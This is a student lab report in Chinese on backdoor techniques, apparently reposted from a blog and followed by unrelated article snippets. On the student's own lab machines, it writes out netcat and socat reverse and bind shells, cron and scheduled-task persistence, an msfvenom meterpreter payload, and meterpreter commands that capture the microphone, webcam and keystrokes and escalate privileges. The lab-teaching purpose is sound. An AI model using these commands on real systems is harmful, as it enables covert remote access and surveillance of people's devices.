2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践

  • 实验内容

    • (1)使用netcat获取主机操作Shell,cron启动

    • (2)使用socat获取主机操作Shell, 任务计划启动

    • (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    • (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

  • 常用后门工具
    • netcat
      • Win获得Linux Shell
      • Linux获得Win Shell
    • Meterpreter
  • 基础问题回答

    • (1)例举你能想到的一个后门进入到你系统中的可能方式?
      • 通过浏览网页而不知不觉中自动下载的程序,像木马那样。
    • (2)例举你知道的后门如何启动起来(win及linux)的方式?
      • win通过修改注册表、设置为开机自启动;linux通过cron启动
    • (3)Meterpreter有哪些给你映像深刻的功能?
      • 可以获取被控主机的摄像头权限,查询你的击键内容。
    • (4)如何发现自己有系统有没有被安装后门?
      • 查看任务计划程序、开机自启动项、注册表项中是否有可疑程序;使用防火墙、杀毒软件。定期对电脑进行安全扫描。
  • 实践过程记录

实验前期准备

netcat:Windows获得Linux Shell

  • 使用ipconfig查看win7网络地址
  • 使用ncat.exe程序监听本机的5301端口ncat.exe -l -p 5301
  • 在Kali环境下,使用nc 192.168.1.192 5301 -e /bin/sh成功获得Kali的shell,如下图所示

1296455-20190323231328494-692039057.png

Linux获得Windows Shell

  • 在kali中使用ifconfig查看IP,打开监听nc -l -p 5301
  • 在Windows中反弹连接kali,ncat.exe -e cmd.exe 192.168.216.130 5301
  • kali成功获得Windows的命令提示
    1296455-20190323233806188-1627273942.png

使用nc传输数据

  • Windows下监听``5301端口,ncat.exe -l 5301```
  • kali反弹连接到Windows的5301端口,nc 192.168.1.192 5301```
  • 连接建立成功,双方可以相互传输数据
    1296455-20190323234302693-1837809770.png

任务一:使用netcat获取主机操作Shell,cron启动

  • 在Windows系统下,监听5301端口

  • 在Kali环境下,用crontab -e指令编辑一条定时任务,(crontab指令增加一条定时任务,"-e"表示编辑)选择编辑器时选择3(第一次会提示选择编辑器,以后就不会提示了);

  • 在最后一行添加01 * * * * /bin/netcat 169.254.175.85 5318 -e /bin/sh,意思是在每个小时的第1分钟反向连接Windows主机的5301端口

1296455-20190324091237965-840322363.png

  • 当时间到达时,win成功获取linux的shell
    1296455-20190324091348376-1718707757.png

任务二:使用socat获取主机操作Shell, 任务计划启动

  • 在Wiondws中搜索计算机管理,在弹出的窗口点击创建任务,填写任务名exp2,在任务栏下选择socat.exe的路径,然后在参数栏填写tcp-listen:5301 exec:cmd.exe,pty,stderr后,点击确定。在列表中右键选中刚刚创建的任务,点击运行。
    1296455-20190324093253417-1361204453.png

  • windows+l,锁定计算机,再启动已创建的任务。在linux的终端输入socket - tcp:192.168.1.192:5301,此时可以发现已经成功获得了一个cmd shell
    1296455-20190324093311161-442139145.png

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.130 LPORT=5301 -f exe > 20165301_backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20165301_backdoor.exe”
    1296455-20190324204143667-1420067422.png

  • 在Windows下执行ncat.exe -l 5301 > 20165301_backdoor.exe,这样被控主机就进入了接收文件模式
    1296455-20190324204108505-1608957727.png

  • 在Linux中执行nc 172.20.10.3 5301 < 20165301_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP,文件传输成功
    1296455-20190324204221258-949343886.png

  • 在Kali上使用msfconsole指令进入msf控制台
    1296455-20190324204252575-903326189.png

  • 输入use exploit/multi/handler使用监听模块,设置payload

  • set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

  • set LHOST 192.168.216.130,这里用的是LinuxIP,和生成后门程序时指定的IP相同

  • set LPORT 5301,同样要使用相同的端口
  • 输入show options,输入exploit
    1296455-20190324204340487-805874701.png

  • 运行Windows下的后门程序
    1296455-20190324204505366-259641297.png

  • 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell
    1296455-20190324204542067-1658304271.png

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令可以截获一段音频
    1296455-20190324205221505-1447773680.png

  • 使用webcam_snap指令可以使用摄像头进行拍照
    1296455-20190324205249612-1969948774.png

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
    1296455-20190324205316189-597461210.png

  • 使用screenshot指令可以进行截屏
    1296455-20190324205347539-1563698423.png

  • 先使用getuid令查看当前用户,使用etsystem指令进行提权
    1296455-20190324205415106-146666840.png

  • 实验总结与体会
    • 本次实验室一次非常有趣的实验。在实践过程中我学会和如何运用ncat、socat进行攻击。在实验过程中我遇到的最严重的问题是在实验三中。最终生成的.exe程序无法运行,经过反复尝试,关闭了防火墙、杀毒软件,搞清楚输入谁的ip地址后,终于成功了。在攻击成功之后,也是我深刻地认识到了保护好计算机安全的重要性。

转载于:https://www.cnblogs.com/CTF5301/p/10590330.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/483842.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

世界机器人大会|人工智能VS人类

来源&#xff1a;新华社作者&#xff1a;北京邮电大学人工智能学院 刘伟配音&#xff1a;郑琬策划、终审&#xff1a;刘君校对&#xff1a;周雪晴2021世界机器人大会于9月10日至13日在北京召开&#xff0c;世界机器人博览会及世界机器人大赛将同期举办。其实&#xff0c;智能不…

LeetCode LCP 06. 拿硬币

题目&#xff1a;桌上有 n 堆力扣币&#xff0c;每堆的数量保存在数组 coins 中。我们每次可以选择任意一堆&#xff0c;拿走其中的一枚或者两枚&#xff0c;求拿完所有力扣币的最少次数。 示例 1&#xff1a; 输入&#xff1a;[4,2,1]输出&#xff1a;4解释&#xff1a;第一…

华为:憧憬6G,共同定义6G

来源&#xff1a;华为华为心声社区发布了由徐直军签发的总裁办电子邮件&#xff0c;邮件内容为徐直军为《6G无线通信新征程》一书作的序《憧憬6G&#xff0c;共同定义6G》。徐直军在文中表示&#xff0c;6G将在2030年左右投向市场&#xff0c;究竟市场将会迎来什么样的6G&#…

“中国诺奖”2021未来科学大奖公布:袁国勇、裴伟士、张杰、施敏获奖,总奖金300万美元...

来源&#xff1a;学术头条中国首个由科学家、企业家共同发起的民间公益组织颁发的世界级科学大奖——未来科学大奖&#xff0c;9 月 12 日正式揭晓 2021 年生命科学奖、物质科学奖、数学与计算机科学奖获奖名单。香港大学袁国勇、裴伟士获得生命科学奖。获奖理由&#xff1a;他…

实验二——函数重载,快速排序,类对象

函数重载&#xff1a; #include<iostream> using namespace std; struct complex{ double real; double imaginary; }; int add(int,int); double add(double,double); complex add(complex,complex); int main() { int a12,b13; double a22.0,b23.0; struct complex num…

LeetCode 771. 宝石与石头

题目&#xff1a; 给定字符串J 代表石头中宝石的类型&#xff0c;和字符串 S代表你拥有的石头。 S 中每个字符代表了一种你拥有的石头的类型&#xff0c;你想知道你拥有的石头中有多少是宝石。 J 中的字母不重复&#xff0c;J 和 S中的所有字符都是字母。字母区分大小写&#…

【前沿技术】Facebook 硬件负责人,带摄像头的智能眼镜将在 10 年内成为常态

拍照功能将在十年内成为智能眼镜的标准配置来源&#xff1a;智能研究院在 Facebook 与 Luxottica 的首款智能眼镜合作产品 Ray-Ban Stories 发布后&#xff0c;Facebook 硬件业务负责人 Andrew Bosworth 周五在与 Essilor Luxottica 的首席可穿戴设备官 Rocco Basilico 交谈时表…

9大领域50名青年学者获2021年科学探索奖,单人奖金300万元

来源&#xff1a;科学探索奖官网、科学网等9 月 13 日&#xff0c;2021 年科学探索奖获奖人名单公布&#xff0c;来自 9 个领域的 50 名青年科学家获奖。其中包括 8 名女性科学家&#xff0c;最年轻获奖者仅 32 岁。他们将在 5 年内获得总计 300 万元人民币的奖金&#xff0c;可…

多角度回顾因果推断的模型方法

来源&#xff1a;AI干货知识库推断因果关系&#xff0c;是人类思想史与科学史上的重要主题。现代因果推断的研究&#xff0c;始于约尔-辛普森悖论&#xff0c;经由鲁宾因果模型、随机试验等改进&#xff0c;到朱力亚珀尔的因果革命&#xff0c;如今因果科学与人工智能的结合正掀…

Eclipse+ADT+Android SDK 搭建安卓开发环境

要求&#xff1a;windows 7 基本操作。运行环境&#xff1a;windows 7(64位); eclipse-jee-luna-SR2-win32(32位);ADT-23.0.4 最近刚开始接触Android(安卓)嵌入式开发&#xff0c;首要问题是搭建Andoid开发环境&#xff0c;由于本人用的是windows7的笔记本&#xff0c;也就只能…

骆利群院士最新Science综述:神经环路架构,激发新的AI

来源&#xff1a;ScienceAI编辑&#xff1a;凯霞人脑包含大约 1000 亿个神经元&#xff0c;每个神经元都有数千个突触连接。尽管单个神经元是神经系统的基本单位&#xff0c;但正是它们的突触连接模式使神经元能够为特定功能形成专门的神经环路&#xff0c;从而使大脑成为强大的…

软件设计作业 1

第一部分先列出本次采用Scrum敏捷编程的任务完成情况&#xff0c;并写出心得 酒店管理系统能够极大的方便酒店的工资人员在关于酒店的管理的操作&#xff0c;如客人入住、退房&#xff0c;信息录入、查询等&#xff0c;极大的提高了酒店整体管理活动的工作效率。 使用Scrum使得…

决策树简介与入门

决策树表示对象属性&#xff08;比如贷款用户的年龄、是否有工作、是否有房产、信用评分等&#xff09;和对象类别&#xff08;是否批准其贷款申请&#xff09;之间的一种映射。使用层层推理来实现最终的分类。  根节点&#xff1a;包含样本的全集  内部节点&#xff1a;对…

前端vue实现pdf文件的在线预览

3.前端vue实现pdf文件的在线预览 我是通过 <iframe> 标签就可以满足我工作的 pdf预览需求 如果<iframe> 无法满足需求 &#xff0c; 可以使用pdf.js这个插件&#xff0c;功能强大。 <iframe:src"url"type"application/x-google-chrome-pdf"…

中国科学院院士骆清铭: “看见”大脑

来源&#xff1a;瞭望 新闻周刊编辑&#xff1a;宋若一责任编辑&#xff1a;冀娴贤文&#xff1a;《瞭望》新闻周刊记者 扈永顺 ◇以工业化的方式大规模、标准化地产生数据并绘制脑图谱&#xff0c;将改变神经科学已有的研究方式◇“全脑介观神经联接图谱”大科学计划目前已凝…

聚类算法 K-Means 简介与入门

K-Means 算法是最简单的一种聚类算法&#xff0c;属于无监督学习算法。 聚类和分类最大的不同在于&#xff1a;分类的目标是事先已知的&#xff0c;而聚类则不一样&#xff0c;聚类事先不知道目标变量是什么&#xff0c;类别没有像分类那样被预先定义出来。 假设我们的样本是 …

聚焦五大领域:浙江大学发布《重大领域交叉前沿方向2021》报告

来源&#xff1a;浙江大学以智能化为特征的第四次工业革命已经全面开启&#xff0c;会聚技术的不断涌现&#xff0c;正引领各领域创新突破性跃迁。学科交叉是这场变革的核心驱动力&#xff0c;主要表现为信息、生命、物质三大学科板块间的深度融合&#xff0c;最终将推动人类生…

分类算法支持向量机(SVM) 简介与入门

在二维平面上&#xff0c;把两类数据分开需要一条直线。到了3微空间&#xff0c;要把两类数据分开&#xff0c;就需要一个平面。把上述分类机制扩展到基本情形&#xff0c;在高维空间里&#xff0c;把两类数据分开&#xff0c;则需要一个超平面。直线和平面是超平面在2维和3维空…

主宰这个世界的10大算法

来源&#xff1a;算法与数学之美什么是算法&#xff1f;简而言之&#xff0c;任何定义明确的计算步骤都可称为算法&#xff0c;接受一个或一组值为输入&#xff0c;输出一个或一组值。(来源&#xff1a;homas H. Cormen, Chales E. Leiserson 《算法导论第3版》)可以这样理解&a…

关联规则分析 Apriori 算法 简介与入门

关联规则的几个概念&#xff1a; 关联规则是形如 X -> Y 的蕴含式&#xff0c;表示通过 X 可以推导出 Y&#xff0c;X称为关联规则的左部&#xff08;Left Hand Side&#xff0c;LHS&#xff09;&#xff0c;Y 称为关联规则的右部&#xff08;Right Hand Side&#xff0c;R…